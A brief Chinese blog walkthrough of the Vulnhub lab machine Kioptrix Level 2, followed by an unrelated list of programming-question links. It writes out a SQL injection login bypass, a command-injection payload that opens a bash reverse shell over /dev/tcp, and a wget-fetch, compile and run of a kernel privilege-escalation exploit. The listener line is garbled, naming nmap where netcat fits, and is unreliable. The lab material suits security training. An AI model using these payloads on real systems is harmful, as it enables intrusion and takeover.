Vulnhub靶机 Kioptrix: Level 2

热度：77 发布时间：2023-12-03 13:28:09.0

在这里插入图片描述
找靶机，扫端口

在这里插入图片描述

没有验证机制
看的我都想暴力破解了
万能密码试一下
可以绕过

在这里插入图片描述

admin‘ or ’1‘=’1

在这里插入图片描述

抓包，这个样子
命令执行

在这里插入图片描述

192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1&
nmap -lnvp 4444

在这里插入图片描述

linux内核2.6.9 在这里插入图片描述

在这里插入图片描述

python -m SimpleHTTPServer 8080
cd /tmp
wget http：//192.168.0.128/1.c
gcc -o 9545 1.c
./9545
whoami

完成

查看全文

相关解决方案

确实很难：在trust level="Medium"下调用第三方控件解决方案
()谁能教下小弟我将<%#DataBinder.Eval(Container.DataItem,"level")%>(level为INT类型)在页面中显示为汉字啊
思科 level 15 access 初始用户名和密码是多少？该怎么处理
思科 level 15 access 初步用户名和密码是多少
C和Java都是可移植的，但分别在不同 level
java+HTML5的XMLHttpRequest Level 二新特性实现文件上传，上传进度条
CSS_中的z-index（2）《元素层叠级别（stack level）及z-index剖析》
DataTree 的Recursive Level 在绑定的Dataset刷新以后
DOM Level 一学习之一_关于Node
给页面加紧，干掉Dom Level 0 Event
给页面加快，干掉Dom Level 0 Event
准确选择J2EE Specification level
java.lang.NoClassDefFoundError: org/apache/log4j/Level 错误
Eclipse停Java compiler level does not match the version of the installed Java pr
linux中oracle手工创办数据库出错，ORA-00604: error occurred at recursive SQL level ！alert如下
ORA-00604: error occurred at recursive SQL level 1
安卓版本跟Api Level
使用JDK1.7 eclipse报错 Android requires compiler compliance level 5.0 or 6.0.解决办法
Call requires API level 11 (current min is 8): new android.app.Fragment API版本冲突解决方法
Android Studio 批改api level
Android Call requires API level 11 (current min is 八)的解决方案
USB CCID开发 APDU level跟TPDU level 区别
USB CCID开发 APDU level和TPDU level 区别,该如何解决
baksmali反编译出现:UNEXPECTED TOP-LEVEL ERROR:Too many open files
error the @annotation pointcut expression is only supported at Java 5 compliance level or above 错误解决
Python脚本运行出现语法异常：IndentationError: unindent does not match any outer indentation level
ORA-00604: error occurred at recursive SQL level 一
Pat(Advanced Level)Practice-1022(Digital Library)
施用JDK1.7 eclipse报错 Android requires compiler compliance level 5.0 or 6.0
Android requires compiler compliance level 5.0 or 6.0. Found '1.7'解决思路